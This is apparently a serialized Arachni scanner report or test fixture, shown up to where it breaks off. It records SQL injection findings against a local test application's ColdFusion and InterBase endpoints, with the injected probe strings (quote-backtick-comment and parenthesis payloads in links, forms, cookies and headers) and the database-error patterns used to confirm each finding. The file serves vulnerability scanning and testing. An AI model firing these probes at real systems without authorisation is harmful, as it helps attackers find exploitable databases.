Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/coldfusion/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/coldfusion/link/append?input=default :verification: :id: ! '[SQLServer JDBC Driver]' var: input url: http://localhost:7362/coldfusion/link/append?input=default injected: default'`-- id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: link remarks: {} method: GET response: ! 
'[Macromedia][SQLServer JDBC Driver] ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/coldfusion/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/coldfusion/cookie/append :verification: :id: ! '[SQLServer JDBC Driver]' var: cookie2 url: http://localhost:7362/coldfusion/cookie/append injected: cookie value) id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: cookie remarks: {} method: GET response: ! 
'[Macromedia][SQLServer JDBC Driver] ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/coldfusion/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/coldfusion/cookie/flip :verification: :id: ! '[SQLServer JDBC Driver]' var: Parameter flip url: http://localhost:7362/coldfusion/cookie/flip injected: '' id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: cookie remarks: {} method: GET response: ! 
'[nil, "[Macromedia][SQLServer JDBC Driver]\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoyMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/coldfusion/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/coldfusion/header/append :verification: :id: ! '[SQLServer JDBC Driver]' var: User-Agent url: http://localhost:7362/coldfusion/header/append injected: arachni_user'`-- id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: header remarks: {} method: GET response: ! 
'[Macromedia][SQLServer JDBC Driver] ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoyOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/coldfusion/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:\[SQLServer JDBC Driver\]) :match: ! '[SQLServer JDBC Driver]' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/coldfusion/header/flip :verification: :id: ! '[SQLServer JDBC Driver]' var: Parameter flip url: http://localhost:7362/coldfusion/header/flip injected: '' id: ! '[SQLServer JDBC Driver]' regexp: (?i-mx:\[SQLServer JDBC Driver\]) regexp_match: ! '[SQLServer JDBC Driver]' elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "[Macromedia][SQLServer JDBC Driver]\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTkx !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0MiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/interbase/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/interbase/form/flip :verification: :id: Unexpected end of command in statement var: Parameter flip url: http://localhost:7362/interbase/form/flip injected: '' id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: form remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'["Warning: ibase_\nUnexpected end of command in statement\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/interbase/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ) :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default) :follow_location: true :injected: default) :combo: !binary "aW5wdXQ=": default) :action: http://localhost:7362/interbase/form/append :verification: :id: Unexpected end of command in statement var: input url: http://localhost:7362/interbase/form/append injected: default) id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: form remarks: {} method: GET response: ! 
'Warning: ibase_ Unexpected end of command in statement ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/interbase/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/interbase/link/flip?input=default :verification: :id: Unexpected end of command in statement var: Parameter flip url: http://localhost:7362/interbase/link/flip?input=default injected: '' id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: link remarks: {} method: GET response: ! 
'["Warning: ibase_\nUnexpected end of command in statement\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjo0NiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/interbase/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:Unexpected end of command in statement) :match: Unexpected end of command in statement :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/interbase/link/append?input=default :verification: :id: Unexpected end of command in statement var: input url: http://localhost:7362/interbase/link/append?input=default injected: default'`-- id: Unexpected end of command in statement regexp: (?i-mx:Unexpected end of command in statement) regexp_match: Unexpected end of command in statement elem: link remarks: 